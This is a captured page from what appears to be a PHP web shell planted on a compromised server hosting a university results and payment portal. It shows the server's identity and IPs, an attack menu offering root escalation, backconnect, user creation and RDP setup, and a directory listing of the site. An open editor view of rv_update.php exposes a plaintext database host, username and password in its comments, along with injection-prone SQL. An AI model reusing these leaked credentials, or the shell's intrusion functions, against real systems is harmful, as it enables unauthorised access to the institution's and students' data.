Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.223.205.151
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde /
[ HOME SHELL ]
Name
Size
Permission
Action
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
adm
[ DIR ]
drwxr-xr-x
adm2018
[ DIR ]
drwxr-xr-x
adm_old
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
halltickets
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
imported_files
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
misc_files
[ DIR ]
drwxrwxrwx
rev
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src_stop
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tmpphotos
[ DIR ]
drwxrwxrwx
user_images
[ DIR ]
drwxr-xr-x
validation_files
[ DIR ]
drwxr-xr-x
.htaccess
602
B
-rwxr-xr-x
MainPage.html
12.31
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
TAGMAY2013.pdf
331.03
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
899
B
-rwxr-xr-x
cconfig_old.php
1.13
KB
-rwxr-xr-x
cnvo_paytm.php
1.33
KB
-rwxr-xr-x
collegeInfoPopup.html
3.76
KB
-rwxr-xr-x
favicon.ico
1.12
KB
-rwxr-xr-x
getQPdet.php
6.74
KB
-rw-rw-r--
homepage.html
3.35
KB
-rwxr-xr-x
index.php
83
B
-rwxr-xr-x
index_new_portal.php
83
B
-rwxr-xr-x
index_stop.html
5.81
KB
-rwxr-xr-x
index_wait.html
20.82
KB
-rwxr-xr-x
indexlatest.html
5.16
KB
-rwxr-xr-x
indexlogin_stop.html
5.96
KB
-rwxr-xr-x
indexold.html
5.19
KB
-rwxr-xr-x
kusstr.sql
16
KB
-rwxr-xr-x
logo.jpg
29.02
KB
-rwxr-xr-x
mainpage.htm
31.7
KB
-rwxr-xr-x
oasis_manual.pdf
1.2
MB
-rwxr-xr-x
paytm_res.php
4.24
KB
-rwxr-xr-x
rv report format.doc
30
KB
-rwxr-xr-x
rv_update.php
1.78
KB
-rwxr-xr-x
serv_paytm.php
1.27
KB
-rwxr-xr-x
valdet.php
12.04
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rv_update.php
<?php ini_set('max_execution_time', 600); // $servername = "97.74.228.93"; // $username = "logisys3_logu"; // $password = "Logisys@2106"; // $dbname = "logisys3_kusd"; include("/var/www/config.php"); $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = "logisys3_kusd"; /*$servername = "localhost"; $username = "root"; $password = ""; $dbname = "resultsg_kus";*/ $conn = new mysqli($servername, $username, $password, $dbname); // $update="update pgstudadm p, pg_txn t set p.`FPAYSTATUS` = 'success', p.FPAYREMARKS = 'Manual', // p.FPAYID = t.fappno, FPAYDATE = now() // where p.fappno = t.fappno // and ifnull(p.`FPAYSTATUS`,'') <> 'success'"; // $result = $conn->query($update); $query = "select distinct ac.appno, ac.fregno, ac.FPAYMENTSTATUS, ac.FPAYGATEWAY,kp.fname as fname, ac.FDATE, ac.fcollcode, ac.fdegree ,kp.ftranid from res_stud ac inner join pg_txn kp on ac.appno = kp.fappno where ifnull(ac.FPAYMENTSTATUS,'') <> 'success'"; $resultm = $conn->query($query); if (mysqli_num_rows($resultm) > 0) { while($row = mysqli_fetch_assoc($resultm)) { $productinfo = $row['appno']; $regno = $row['fregno']; $paytm = $row['FPAYGATEWAY']; $degree = $row['fdegree']; $collcode = $row['fcollcode']; $fname = $row['fname']; $txnid = $row['ftranid']; //$firstname = "paytm"; $update="update res_stud set FPAYMENTREMARKS='{$txnid}',FPAYMENTSTATUS='success', FPAYMENTCONFIRM='success', fackdate = current_date(), funivrecdate = current_date(), fackuser = '{$fname}', FCHALLANNO = '{$productinfo}' where APPNO='{$productinfo}'"; $result = $conn->query($update); //var_dump($insert_studfee); echo $regno; echo "<br/>"; } } ?>
Close